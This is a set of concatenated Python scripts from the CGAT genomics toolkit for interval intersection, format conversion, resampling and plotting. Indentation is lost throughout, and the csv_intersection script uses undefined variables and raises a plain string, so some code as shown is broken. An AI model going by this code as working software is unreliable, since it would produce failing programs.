(nworkspaces, nmiddle, nempty_workspaces, nempty_contigs))
######################################################
# transform counts
if options.transform_counts == "cumulative":
transform = cumulative_transform
elif options.transform_counts == "raw":
transform = normalize_transform
####################################################
# analysis
if "proximity" in options.analysis:
outfile_proximity = E.openOutputFile("proximity")
outfile_proximity.write("\t".join(("label", "observed", "pvalue",
"expected", "CIlower", "CIupper", "qvalue", "segments", "workspaces")) + "\n")
else:
outfile_proximity = None
if "area-under-curve" in options.analysis:
outfile_auc = E.openOutputFile("auc")
outfile_auc.write("label\tobserved\texpected\tCIlower\tCIupper\n")
else:
outfile_auc = None
# qvalue: expected false positives at p-value
# qvalue = expected false positives /
if options.do_fdr:
E.info("computing pvalues for fdr")
for counter in counters:
for label in labels:
E.info("working on counter:%s label:%s" % (counter, label))
# collect all P-Values of simulated results to compute FDR
sim_pvalues = []
medians = counter.getMedians(label)
for median in medians:
pvalue = float(
scipy.stats.percentileofscore(medians, median)) / 100.0
sim_pvalues.append(pvalue)
sim_pvalues.sort()
else:
sim_pvalues = []
# compute observed p-values
for counter in counters:
counter.update()
obs_pvalues = []
for counter in counters:
for label in labels:
obs_pvalues.append(counter.mStats[label].pvalue)
obs_pvalues.sort()
# compute observed p-values
if options.do_fdr:
for counter in counters:
counter.updateFDR(obs_pvalues, sim_pvalues)
for counter in counters:
outofbounds_sim, totals_sim = 0, 0
outofbounds_obs, totals_obs = 0, 0
for label in labels:
for sample in range(options.num_samples):
if counter.mSimulatedCounts[sample].mOutOfBounds[label]:
E.debug("out of bounds: sample %i, label %s, counts=%i" %
(sample, label, counter.mSimulatedCounts[sample].mOutOfBounds[label]))
outofbounds_sim += counter.mSimulatedCounts[
sample].mOutOfBounds[label]
totals_sim += counter.mSimulatedCounts[sample].mTotals[label]
outofbounds_obs += counter.mObservedCounts.mOutOfBounds[label]
totals_obs += counter.mObservedCounts.mTotals[label]
E.info("out of bounds observations: observed=%i/%i (%5.2f%%), simulations=%i/%i (%5.2f%%)" %
(outofbounds_obs, totals_obs,
100.0 * outofbounds_obs / totals_obs,
outofbounds_sim, totals_sim,
100.0 * outofbounds_sim / totals_sim,
))
for label in labels:
if outfile_auc:
mmin, mmax, mmean = counter.getEnvelope(
label, transform=normalize_transform)
obs = normalize_transform(
counter.mObservedCounts[label], counter.mObservedCounts.mOutOfBounds[label])
def block_iterator(a1, a2, a3, num_bins):
x = 0
while x < num_bins:
while x < num_bins and a1[x] <= a2[x]:
x += 1
start = x
while x < options.num_bins and a1[x] > a2[x]:
x += 1
end = x
total_a1 = a1[start:end].sum()
total_a3 = a3[start:end].sum()
if total_a1 > total_a3:
yield (total_a1 - total_a3, start, end, total_a1, total_a3)
blocks = list(
block_iterator(obs, mmax, mmean, options.num_bins))
if options.output_all:
for delta, start, end, total_obs, total_mean in blocks:
if end - start <= 1:
continue
outfile_auc.write("%s\t%i\t%i\t%i\t%f\t%f\t%f\t%f\t%f\n" %
(label,
start * options.resolution,
end * options.resolution,
(end - start) * options.resolution,
total_obs,
total_mean,
delta,
total_obs / total_mean,
100.0 * (total_obs / total_mean - 1.0)))
# output best block
blocks.sort()
delta, start, end, total_obs, total_mean = blocks[-1]
outfile_auc.write("%s\t%i\t%i\t%i\t%f\t%f\t%f\t%f\t%f\n" %
(label,
start * options.resolution,
end * options.resolution,
(end - start) * options.resolution,
total_obs,
total_mean,
delta,
total_obs / total_mean,
100.0 * (total_obs / total_mean - 1.0)))
if outfile_proximity:
# find error bars at median
st = counter.mStats[label]
outfile_proximity.write("%s\t%i\t%f\t%i\t%i\t%i\t%s\t%i\t%i\n" %
(label,
st.observed *
options.resolution,
st.pvalue,
st.expected *
options.resolution,
st.ci95lower *
options.resolution,
st.ci95upper *
options.resolution,
IOTools.val2str(st.qvalue),
segments_per_label[label],
workspaces_per_label[label],
))
if options.plot:
for counter in counters:
plotCounts(counter, options, transform)
# plot summary stats
plt.figure()
plt.title("distribution of workspace length")
data = []
for contig, segs in workspace.iteritems():
if len(segs) == 0:
continue
data.extend([x[1] - x[0] for x in segs])
vals, bins = numpy.histogram(
data, bins=numpy.arange(0, max(data), 100), new=True)
t = float(sum(vals))
plt.plot(bins[:-1], numpy.cumsum(vals) / t)
plt.gca().set_xscale('log')
plt.legend()
t = float(sum(vals))
plt.xlabel("size of workspace")
plt.ylabel("cumulative relative frequency")
if options.hardcopy:
plt.savefig(
os.path.expanduser(options.hardcopy % "workspace_size"))
plt.figure()
plt.title("segments per block")
vals, bins = numpy.histogram(segments_per_workspace, bins=numpy.arange(
0, max(segments_per_workspace), 1), new=True)
plt.plot(bins[:-1], vals)
plt.xlabel("segments per block")
plt.ylabel("absolute frequency")
if options.hardcopy:
plt.savefig(
os.path.expanduser(options.hardcopy % "segments_per_block"))
plt.figure()
plt.title("workspaces per label")
plt.barh(
range(0, len(labels)), [workspaces_per_label[x] for x in labels], height=0.5)
plt.yticks(range(0, len(labels)), labels)
plt.ylabel("workspaces per label")
plt.xlabel("absolute frequency")
plt.gca().set_xscale('log')
if options.hardcopy:
plt.savefig(
os.path.expanduser(options.hardcopy % "workspaces_per_label"))
plt.figure()
plt.title("segments per label")
plt.barh(range(0, len(labels)), [segments_per_label[x]
for x in labels], height=0.5)
plt.yticks(range(0, len(labels)), labels)
plt.ylabel("segments per label")
plt.xlabel("absolute frequency")
plt.xticks(range(0, len(labels)), labels)
if options.hardcopy:
plt.savefig(
os.path.expanduser(options.hardcopy % "segments_per_label"))
if not options.hardcopy:
plt.show()
E.Stop()
if __name__ == "__main__":
sys.exit(main())
```
#### File: cgat/scripts/bam_vs_bed.py
```python
import sys
import collections
import itertools
import subprocess
import CGAT.Experiment as E
import CGAT.IOTools as IOTools
import pysam
import CGAT.Bed as Bed
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
# setup command line parser
parser = E.OptionParser(version="%prog version: $Id$",
usage=globals()["__doc__"])
parser.add_option("-m", "--min-overlap", dest="min_overlap",
type="float",
help="minimum overlap [%default]")
parser.add_option("-a", "--bam-file", dest="filename_bam",
metavar="bam", type="string",
help="bam-file to use (required) [%default]")
parser.add_option("-b", "--bed-file", dest="filename_bed",
metavar="bed", type="string",
help="bed-file to use (required) [%default]")
parser.add_option(
"-s", "--sort-bed", dest="sort_bed",
action="store_true",
help="sort the bed file by chromosomal location before "
"processing. "
"[%default]")
parser.add_option(
"--assume-sorted", dest="sort_bed",
action="store_false",
help="assume that the bed-file is sorted by chromosomal location. "
"[%default]")
parser.add_option(
"--split-intervals", dest="split_intervals",
action="store_true",
help="treat split BAM intervals, for example spliced intervals, "
"as separate intervals. Note that a single alignment might be "
"counted several times as a result. "
"[%default]")
parser.set_defaults(
min_overlap=0.5,
filename_bam=None,
filename_bed=None,
sort_bed=True,
split_intervals=False,
)
# add common options (-h/--help, ...) and parse command line
(options, args) = E.Start(parser, argv=argv)
filename_bam = options.filename_bam
filename_bed = options.filename_bed
if filename_bam is None and filename_bed is None:
if len(args) != 2:
raise ValueError(
"please supply a bam and a bed file or two bed-files.")
filename_bam, filename_bed = args
if filename_bed is None:
raise ValueError("please supply a bed file to compare to.")
if filename_bam is None:
raise ValueError("please supply a bam file to compare with.")
E.info("intersecting the two files")
min_overlap = options.min_overlap
options.stdout.write("category\talignments\n")
# get number of columns of reference bed file
for bed in Bed.iterator(IOTools.openFile(filename_bed)):
ncolumns_bed = bed.columns
break
E.info("assuming %s is bed%i format" % (filename_bed, ncolumns_bed))
if ncolumns_bed < 4:
raise ValueError("please supply a name attribute in the bed file")
# get information about
if filename_bam.endswith(".bam"):
format = "-abam"
samfile = pysam.Samfile(filename_bam, "rb")
total = samfile.mapped
# latest bedtools uses bed12 format when bam is input
ncolumns_bam = 12
# count per read
sort_key = lambda x: x.name
else:
format = "-a"
total = IOTools.getNumLines(filename_bam)
# get bed format
ncolumns_bam = 0
for bed in Bed.iterator(IOTools.openFile(filename_bam)):
ncolumns_bam = bed.columns
break
if ncolumns_bam > 0:
E.info("assuming %s is bed%i fomat" % (filename_bam, ncolumns_bam))
if ncolumns_bam == 3:
# count per interval
sort_key = lambda x: (x.contig, x.start, x.end)
else:
# count per interval category
sort_key = lambda x: x.name
# use fields for bam/bed file (regions to count with)
data_fields = [
"contig", "start", "end", "name",
"score", "strand", "thickstart", "thickend", "rgb",
"blockcount", "blockstarts", "blockends"][:ncolumns_bam]
# add fields for second bed (regions to count in)
data_fields.extend([
"contig2", "start2", "end2", "name2",
"score2", "strand2", "thickstart2", "thickend2", "rgb2",
"blockcount2", "blockstarts2", "blockends2"][:ncolumns_bed])
# add bases overlap
data_fields.append("bases_overlap")
data = collections.namedtuple("data", data_fields)
options.stdout.write("total\t%i\n" % total)
if total == 0:
E.warn("no data in %s" % filename_bam)
return
# SNS: sorting optional, off by default
if options.sort_bed:
bedcmd = "<( zcat %s | sort -k1,1 -k2,2n)" % filename_bed
else:
bedcmd = filename_bed
if options.split_intervals:
split = "-split"
else:
split = ""
# IMS: newer versions of intersectBed have a very high memory
# requirement unless passed sorted bed files.
statement = """bedtools intersect %(format)s %(filename_bam)s
-b %(bedcmd)s
%(split)s
-sorted -bed -wo -f %(min_overlap)f""" % locals()
E.info("starting counting process: %s" % statement)
proc = E.run(statement,
return_popen=True,
stdout=subprocess.PIPE)
E.info("counting")
counts_per_alignment = collections.defaultdict(int)
take_columns = len(data._fields)
def iter(infile):
for line in infile:
if not line.strip():
continue
yield data._make(line[:-1].split()[:take_columns])
for read, overlaps in itertools.groupby(iter(proc.stdout), key=sort_key):
annotations = [x.name2 for x in overlaps]
for anno in annotations:
counts_per_alignment[anno] += 1
for key, counts in counts_per_alignment.iteritems():
options.stdout.write("%s\t%i\n" % (key, counts))
# write footer and output benchmark information.
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/bed2graph.py
```python
import sys
import CGAT.Experiment as E
import CGAT.IOTools as IOTools
import CGAT.Bed as Bed
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
# setup command line parser
parser = E.OptionParser(
version="%prog version: $Id: bed2graph.py 2861 2010-02-23 17:36:32Z andreas $", usage=globals()["__doc__"])
parser.add_option("-o", "--output-section", dest="output", type="choice",
choices=("full", "name"),
help="output either ``full`` overlapping entries, only the ``name``s. [default=%default].")
parser.set_defaults(
output="full",
)
# add common options (-h/--help, ...) and parse command line
(options, args) = E.Start(parser, argv=argv)
if len(args) != 2:
raise ValueError("two arguments required")
if args[0] == "-":
infile1 = options.stdin
else:
infile1 = IOTools.openFile(args[0], "r")
infile2 = IOTools.openFile(args[1], "r")
idx = Bed.readAndIndex(infile2, with_values=True)
output = options.output
outfile = options.stdout
if output == "name":
outfile.write("name1\tname2\n")
outf = lambda x: x.fields[0]
else:
outf = str
for bed in Bed.iterator(infile1):
try:
overlaps = idx[bed.contig].find(bed.start, bed.end)
except (KeyError, IndexError):
# ignore missing contig and zero length intervals
continue
for o in overlaps:
outfile.write("\t".join((outf(bed), outf(o[2]))) + "\n")
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/bed2psl.py
```python
import sys
import CGAT.Experiment as E
import CGAT.Blat as Blat
import CGAT.Bed as Bed
import CGAT.IndexedFasta as IndexedFasta
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
# setup command line parser
parser = E.OptionParser(version="%prog version: $Id: bed2psl.py 2899 2010-04-13 14:37:37Z andreas $",
usage=globals()["__doc__"])
parser.add_option("-q", "--query", dest="query", type="string",
help="sequence to use for query [default=%default].")
parser.add_option("-t", "--target", dest="target", type="string",
help="sequence to use for target [default=%default].")
parser.add_option("-g", "--genome-file", dest="genome_file", type="string",
help="filename with genome.")
parser.set_defaults(
genome_file=None,
query=None,
target=None,
)
# add common options (-h/--help, ...) and parse command line
(options, args) = E.Start(parser, argv=argv)
# do sth
ninput, nskipped, noutput = 0, 0, 0
if options.genome_file:
fasta = IndexedFasta.IndexedFasta(options.genome_file)
else:
fasta = None
psl = Blat.Match()
for bed in Bed.iterator(options.stdin):
ninput += 1
start, end = bed.start, bed.end
if "blockSizes" in bed:
psl.mQueryId = bed["name"]
blocksizes = [int(x) for x in bed["blockSizes"].split(",")[:-1]]
sbjctblockstarts = [
int(x) + start for x in bed["blockStarts"].split(",")[:-1]]
strand = bed["strand"]
else:
psl.mQueryId = "%i" % ninput
blocksizes = [end - start]
sbjctblockstarts = [start, ]
strand = "+"
psl.mSbjctId = bed.contig
psl.mSbjctFrom, psl.mSbjctTo = start, end
psl.mQueryFrom, psl.mQueryTo = 0, end - start
psl.mBlockSizes = blocksizes
psl.mNBlocks = len(blocksizes)
psl.strand = strand
q, qp = [], 0
for x in blocksizes:
q.append(qp)
qp += x
psl.mQueryBlockStarts = q
psl.mSbjctBlockStarts = sbjctblockstarts
psl.mQueryLength = sum(psl.mBlockSizes)
if fasta:
psl.mSbjctLength = fasta.getLength(bed.contig)
options.stdout.write("%s\n" % str(psl))
noutput += 1
E.info("ninput=%i, noutput=%i, nskipped=%i" % (ninput, noutput, nskipped))
# write footer and output benchmark information.
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/cat_tables.py
```python
import sys
import fileinput
import CGAT.Experiment as E
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
# setup command line parser
parser = E.OptionParser(
version="%prog version: $Id: cgat_script_template.py 2781 2009-09-10 11:33:14Z andreas $", usage=globals()["__doc__"])
parser.set_defaults(
)
# add common options (-h/--help, ...) and parse command line
(options, args) = E.Start(parser, argv=argv)
if len(args) == 0 or (len(args) == 1 and args[0] == "-"):
infile = options.stdin
else:
infile = fileinput.FileInput(args)
# do sth
ninput, nskipped, noutput = 0, 0, 0
header = False
for line in infile:
ninput += 1
if line.startswith("#"):
pass
elif not header:
header = line
elif line == header:
nskipped += 1
continue
options.stdout.write(line)
noutput += 1
E.info("ninput=%i, noutput=%i, nskipped=%i" % (ninput, noutput, nskipped))
# write footer and output benchmark information.
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/chain2psl.py
```python
import sys
import CGAT.Experiment as E
import CGAT.Blat as Blat
import alignlib_lite
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
# setup command line parser
parser = E.OptionParser(version="%prog version: $Id$",
usage=globals()["__doc__"])
# add common options (-h/--help, ...) and parse command line
(options, args) = E.Start(parser, argv=argv)
# do sth
ninput, nskipped, noutput = 0, 0, 0
psl = None
def chain_iterator(infile):
lines = []
for line in options.stdin:
if line.startswith("#"):
continue
if line.strip() == "":
continue
if line.startswith("chain"):
if lines:
yield lines
lines = []
lines.append(line)
yield lines
for lines in chain_iterator(options.stdin):
ninput += 1
psl = Blat.Match()
(_,
_,
psl.mSbjctId,
target_length,
target_strand,
target_start,
target_end,
psl.mQueryId,
query_length,
query_strand,
query_start,
query_end,
alignment_id) = lines[0][:-1].split()
(psl.mQueryStart, psl.mQueryEnd, psl.mQueryLength,
psl.mSbjctStart, psl.mSbjctEnd, psl.mSbjctLength) = \
[int(x) for x in
(query_start,
query_end,
query_length,
target_start,
target_end,
target_length)]
map_query2target = alignlib_lite.py_makeAlignmentBlocks()
qstart, tstart = psl.mQueryStart, psl.mSbjctStart
for line in lines[1:-1]:
size, dt, dq = [int(x) for x in line[:-1].split()]
map_query2target.addDiagonal(qstart,
qstart + size,
tstart - qstart)
qstart += size + dq
tstart += size + dt
size = int(lines[-1][:-1])
map_query2target.addDiagonal(qstart,
qstart + size,
tstart - qstart)
psl.fromMap(map_query2target)
# sort out strand
# target_strand is always positive
assert(target_strand == "+")
# if query strand is negative
if query_strand == "-":
# invert both query and target
psl.switchTargetStrand()
# manually invert the query coordinates
psl.mQueryFrom, psl.mQueryTo = psl.mQueryLength - \
psl.mQueryTo, psl.mQueryLength - psl.mQueryFrom
options.stdout.write("%s\n" % psl)
noutput += 1
E.info("ninput=%i, noutput=%i, nskipped=%i" % (ninput, noutput, nskipped))
# write footer and output benchmark information.
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/contigs2random_sample.py
```python
import os
import sys
import optparse
import glob
import random
import CGAT.Experiment as E
import CGAT.FastaIterator as FastaIterator
import CGAT.IOTools as IOTools
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
# setup command line parser
parser = optparse.OptionParser(version="%prog version: $Id: contigs2random_sample.py 2871 2010-03-03 10:20:44Z nicki $",
usage=globals()["__doc__"])
parser.add_option("-m", "--species-map", dest="species_map", type="string",
help="text file specifying the mapping between contig and genome")
parser.add_option("-g", "--genome-dir", dest="genome_dir", type="string",
help="specify directory where genome / genomes are stored")
# add common options (-h/--help, ...) and parse command line
(options, args) = E.Start(parser, argv=argv)
# read in contig lengths into dictionary
E.info("reading contigs file")
c_contigs = 0
contigs_lengths = {}
for fasta in FastaIterator.iterate(options.stdin):
c_contigs += 1
# titles of fasta records must be single strings with no special
# characters
contigs_lengths[fasta.title.split(" ")[0]] = len(fasta.sequence)
E.info("read %i contigs" % c_contigs)
# read in mapping between spcies and contigs
species_map = {}
for line in open(options.species_map).readlines():
data = line[:-1].split("\t")
contig, species = data[0], data[1]
species_map[contig] = species
# read genomes into memory
# NB this may need optimisin if using large
# genomes or many genomes
E.info("reading genomes from %s" % options.genome_dir)
# The directory must ONLY contain genome files!!
genomes_sequences = {}
c_genomes = 0
for genome_file in glob.glob(os.path.join(options.genome_dir, "*")):
c_genomes += 1
for fasta in FastaIterator.iterate(IOTools.openFile(genome_file)):
genomes_sequences[fasta.title] = fasta.sequence
E.info("read %i genomes from %s" % (c_genomes, options.genome_dir))
# iterate over the contigs and sample from the respective genome
E.info("iterating over contigs")
c_contigs_output = 0
for contig, length in contigs_lengths.iteritems():
if contig not in species_map:
E.warn("contig %s not in species map file" % contig)
else:
c_contigs_output += 1
genome = species_map[contig]
genome_length = len(genomes_sequences[genome])
# get the start position from which to sample
start = random.randint(1, genome_length)
try:
end = start + length - 1
except ValueError:
print "end of sampled contig extends beyond length of genome"
sampled_seq = genomes_sequences[genome][start:end]
options.stdout.write(
">%s_random\n%s\n" % (contig + "_%s" % species_map[contig], sampled_seq))
E.info("written %i contigs" % c_contigs_output)
# write footer and output benchmark information.
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/csv_intersection.py
```python
import sys
import CGAT.Experiment as E
import CGAT.IOTools as IOTools
import CGAT.CSV as CSV
import csv
import hashlib
class UniqueBuffer:
mKeys = {}
def __init__(self, outfile):
self.mOutfile = outfile
def write(self, out):
key = hashlib.md5(out).digest()
if key not in self.mKeys:
self.mKeys[key] = True
self.mOutfile.write(out)
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if argv is None:
argv = sys.argv
parser = E.OptionParser(
version="%prog version: $Id: csv_intersection.py 2782 2009-09-10 11:40:29Z andreas $")
parser.add_option("-u", "--unique", dest="unique", action="store_true",
help="output rows are uniq.")
parser.set_defaults(
remove=False,
unique=False,
)
(options, args) = E.Start(parser, add_csv_options=True)
if len(args) != 2:
raise "please specify two files to join."
options.filename1, options.filename2 = args
table1 = CSV.readTable(IOTools.openFile(options.filename1, "r"))
table2 = CSV.readTable(IOTools.openFile(options.filename2, "r"))
if options.unique:
outfile = UniqueBuffer(sys.stdout)
else:
outfile = options.stdout
# build new field list
new_fields = []
for x in options.join_fields1:
new_fields.append(x)
for x in fields1:
if x not in options.join_fields1:
new_fields.append(x)
if x not in options.join_fields2:
new_fields.append(x)
writer = csv.DictWriter(outfile,
fields,
dialect=options.csv_dialect,
lineterminator=options.csv_lineterminator,
extrasaction='ignore')
if len(lines) > 0:
old_fields = lines[0][:-1].split("\t")
if options.remove:
fields = []
for x in old_fields:
if x not in input_fields:
fields.append(x)
else:
fields = input_fields
reader = csv.DictReader(lines,
dialect=options.csv_dialect)
print "\t".join(fields)
first_row = True
for row in reader:
row = IOTools.convertDictionary(row)
writer.writerow(row)
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/data2resamples.py
```python
import sys
import pandas as pd
import CGAT.Experiment as E
import CGAT.Timeseries as TS
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if argv is None:
argv = sys.argv
# setup command line parser
parser = E.OptionParser(version="%prog version: $Id$",
usage=globals()["__doc__"])
parser.add_option("-t", "--test", dest="test", type="string",
help="supply help")
parser.add_option("--time", dest="timepoints", type="string",
help="a comma-separated list of time points measured")
parser.add_option("--replicates", dest="reps", type="string",
help="a comma-separated list of replicate IDs")
parser.add_option("--condition", dest="condition", type="string",
help="experimental condition")
parser.add_option("--resamples", dest="resamples", type="string",
help="number of times to resample replicates to"
" generate pseudo datasets")
parser.add_option("--input-gtf", dest="gtf_file", type="string",
help="reference gtf file")
parser.add_option("--output-file-directory", dest="output_dir",
type="string", help="directory to output"
" resampled files to")
parser.add_option("--seed", dest="seed", type="string",
help="seed for pseudo-random number generator")
# add common options (-h/--help, ...) and parse command line
(options, args) = E.Start(parser, argv=argv)
try:
infile = argv[-1]
open(infile, "r")
except IOError:
infile = options.stdin
data_frame = pd.read_table(infile,
sep="\t",
index_col=0,
header=0)
time_str = options.timepoints.split(",")
time_points = [int(x) for x in time_str]
replicates = options.reps.split(",")
reps = int(options.resamples)
its = [time_str, replicates]
midx = pd.MultiIndex.from_product(its,
names=['times', 'replicates'])
TS.genResampleData(data_frame=data_frame,
multiple_index=midx,
replicates=reps,
sample_reps=replicates,
times=time_points,
condition=options.condition,
ref_gtf=options.gtf_file,
out_dir=options.output_dir,
seed=int(options.seed))
# Write footer and output benchmark information.
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/diff_bed.py
```python
import sys
import re
import CGAT.Experiment as E
import CGAT.IOTools as IOTools
import CGAT.Bed as Bed
import numpy
class Counter:
mPercentFormat = "%5.2f"
def __init__(self):
pass
def getHeader(self):
h = []
for a in ("exons", "bases"):
for b in ("total", "ovl", "unique"):
for c in ("1", "2"):
h.append("n" + a + "_" + b + c)
for a in ("exons", "bases"):
for b in ("ovl", "unique"):
for c in ("1", "2"):
h.append("p" + a + "_" + b + c)
return "\t".join(h)
@E.cachedmethod
def buildIndex(self, filename):
return Bed.readAndIndex(IOTools.openFile(filename, "r"))
def _count(self, filename, idx):
'''count filename against idx.'''
overlapping_genes = set()
genes = set()
# iterate over exons
infile = IOTools.openFile(filename, "r")
it = Bed.bed_iterator(infile)
nexons, nexons_overlapping = 0, 0
nbases, nbases_overlapping = 0, 0
for this in it:
nexons += 1
nbases += this.end - this.start
try:
intervals = list(
idx[this.contig].find(max(0, this.start), this.end))
except KeyError:
continue
except Exception, msg:
raise Exception(
"error while processing %s, msg=%s" % (filename, msg))
if len(intervals) == 0:
continue
nexons_overlapping += 1
start, end = this.start, this.end
counts = numpy.zeros(end - start, numpy.int)
for other_start, other_end, other_value in intervals:
for x in range(max(start, other_start) - start, min(end, other_end) - start):
counts[x] += 1
nbases_overlapping += sum([1 for x in counts if x > 0])
infile.close()
return nexons, nexons_overlapping, nbases, nbases_overlapping
def count(self, filename1, filename2):
"""count overlap between two bed files."""
E.info("counting started for %s versus %s" % (filename1, filename2))
idx2 = self.buildIndex(filename2)
(self.mExons1, self.mExonsOverlapping1,
self.mBases1, self.mBasesOverlapping1 ) = \
self._count(filename1, idx2)
self.mExonsUnique1 = self.mExons1 - self.mExonsOverlapping1
self.mBasesUnique1 = self.mBases1 - self.mBasesOverlapping1
idx1 = self.buildIndex(filename1)
(self.mExons2, self.mExonsOverlapping2,
self.mBases2, self.mBasesOverlapping2 ) = \
self._count(filename2, idx1)
self.mExonsUnique2 = self.mExons2 - self.mExonsOverlapping2
self.mBasesUnique2 = self.mBases2 - self.mBasesOverlapping2
def __str__(self):
return "\t".join(map(str, (
self.mExons1, self.mExons2,
self.mExonsOverlapping1, self.mExonsOverlapping2,
self.mExonsUnique1, self.mExonsUnique2,
self.mBases1, self.mBases2,
self.mBasesOverlapping1, self.mBasesOverlapping2,
self.mBasesUnique1, self.mBasesUnique2 ) ) ) + "\t" +\
"\t".join(map(lambda x: IOTools.prettyPercent(*x), (
(self.mExonsOverlapping1, self.mExons1),
(self.mExonsOverlapping2, self.mExons2),
(self.mExonsUnique1, self.mExons1),
(self.mExonsUnique2, self.mExons2),
(self.mBasesOverlapping1, self.mBases1),
(self.mBasesOverlapping2, self.mBases2),
(self.mBasesUnique1, self.mBases1),
(self.mBasesUnique2, self.mBases2))))
class CounterTracks(Counter):
def __init__(self, filename):
self.mIndices = Bed.readAndIndex(IOTools.openFile(filename, "r"),
per_track=True)
def getTracks(self):
return sorted(self.mIndices.keys())
def _countIndices(self, idx_in, idx):
'''count filename against idx.'''
overlapping_genes = set()
genes = set()
# iterate over exons
nexons, nexons_overlapping = 0, 0
nbases, nbases_overlapping = 0, 0
for contig, ix in idx_in.iteritems():
# note: add a findall function to ncl
for start, end, value in ix.find(0, 1000000000):
nexons += 1
nbases += end - start
try:
intervals = list(idx[contig].find(start, end))
except KeyError:
continue
if len(intervals) == 0:
continue
nexons_overlapping += 1
counts = numpy.zeros(end - start, numpy.int)
for other_start, other_end, other_value in intervals:
for x in range(max(start, other_start) - start, min(end, other_end) - start):
counts[x] += 1
nbases_overlapping += sum([1 for x in counts if x > 0])
return nexons, nexons_overlapping, nbases, nbases_overlapping
def count(self, filename, track):
"""count overlap between two gtf files."""
E.info("counting started for %s versus %s" % (filename, track))
(self.mExons1, self.mExonsOverlapping1,
self.mBases1, self.mBasesOverlapping1 ) = \
self._count(filename, self.mIndices[track])
self.mExonsUnique1 = self.mExons1 - self.mExonsOverlapping1
self.mBasesUnique1 = self.mBases1 - self.mBasesOverlapping1
idx = self.buildIndex(filename)
# count index against index
(self.mExons2, self.mExonsOverlapping2,
self.mBases2, self.mBasesOverlapping2 ) = \
self._countIndices(self.mIndices[track], idx)
self.mExonsUnique2 = self.mExons2 - self.mExonsOverlapping2
self.mBasesUnique2 = self.mBases2 - self.mBasesOverlapping2
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
# setup command line parser
parser = E.OptionParser(
version="%prog version: $Id: diff_bed.py 2866 2010-03-03 10:18:49Z andreas $", usage=globals()["__doc__"])
parser.add_option("-u", "--update", dest="filename_update", type="string",
help="if filename is given, previous results will be read from there and only changed sets will be computed [default=%default].")
parser.add_option("-p", "--pattern-identifier", dest="pattern_id", type="string",
help="pattern to convert a filename to an id [default=%default].")
parser.add_option("-t", "--tracks", dest="tracks", action="store_true",
help="compare files against all tracks in the first file [default=%default]")
parser.set_defaults(
filename_update=None,
pattern_id="(.*).bed",
tracks=None,
)
# add common options (-h/--help, ...) and parse command line
(options, args) = E.Start(parser, argv=argv)
if len(args) < 2:
raise ValueError("at least two arguments required")
if options.filename_update:
infile = IOTools.openFile(options.filename_update, "r")
previous_results = {}
for line in infile:
if line.startswith("#"):
continue
if line.startswith("set1"):
continue
data = line[:-1].split("\t")
set1, set2 = data[0], data[1]
if set1 not in previous_results:
previous_results[set1] = {}
if set2 not in previous_results:
previous_results[set2] = {}
previous_results[set1][set2] = "\t".join(data[2:])
rev = [(data[x + 1], data[x]) for x in range(2, len(data), 2)]
previous_results[set2][set1] = "\t".join(IOTools.flatten(rev))
else:
previous_results = {}
pattern_id = re.compile(options.pattern_id)
def getTitle(x):
try:
return pattern_id.search(x).groups()[0]
except AttributeError:
return x
ncomputed, nupdated = 0, 0
if options.tracks:
counter = CounterTracks(args[0])
options.stdout.write("set1\tset2\t%s\n" % counter.getHeader())
for filename in args[1:]:
title1 = getTitle(filename)
for title2 in counter.getTracks():
if previous_results:
try:
prev = previous_results[title1][title2]
except KeyError:
pass
else:
options.stdout.write(
"%s\t%s\t%s\n" % ((title1, title2, prev)))
nupdated += 1
continue
counter.count(filename, title2)
options.stdout.write(
"%s\t%s\t%s\n" % ((title1, title2, str(counter))))
ncomputed += 1
else:
counter = Counter()
options.stdout.write("set1\tset2\t%s\n" % counter.getHeader())
for x in range(len(args)):
title1 = getTitle(args[x])
for y in range(0, x):
title2 = getTitle(args[y])
if previous_results:
try:
prev = previous_results[title1][title2]
except KeyError:
pass
else:
options.stdout.write(
"%s\t%s\t%s\n" % ((title1, title2, prev)))
nupdated += 1
continue
counter.count(args[x], args[y])
options.stdout.write(
"%s\t%s\t%s\n" % ((title1, title2, str(counter))))
ncomputed += 1
E.info("nupdated=%i, ncomputed=%i" % (nupdated, ncomputed))
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/diffgene2venn.py
```python
import sys
import CGAT.Experiment as E
import CGAT.Timeseries as TS
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if argv is None:
argv = sys.argv
# setup command line parser
parser = E.OptionParser(version="%prog version: $Id$",
usage=globals()["__doc__"])
parser.add_option("-t", "--test", dest="test", type="string",
help="supply help")
parser.add_option("--alpha", dest="alpha", type="string",
help="false positive rate for differentially"
" expressed genes")
parser.add_option("--file-list", dest="infiles", type="string",
help="comma separated list of input files")
parser.add_option("--output-directory", dest="out_dir", type="string",
help="output directory for png images")
# add common options (-h/--help, ...) and parse command line
(options, args) = E.Start(parser, argv=argv)
infiles = options.infiles.split(",")
TS.genSigGenes(file_list=infiles,
alpha=float(options.alpha),
out_dir=options.out_dir)
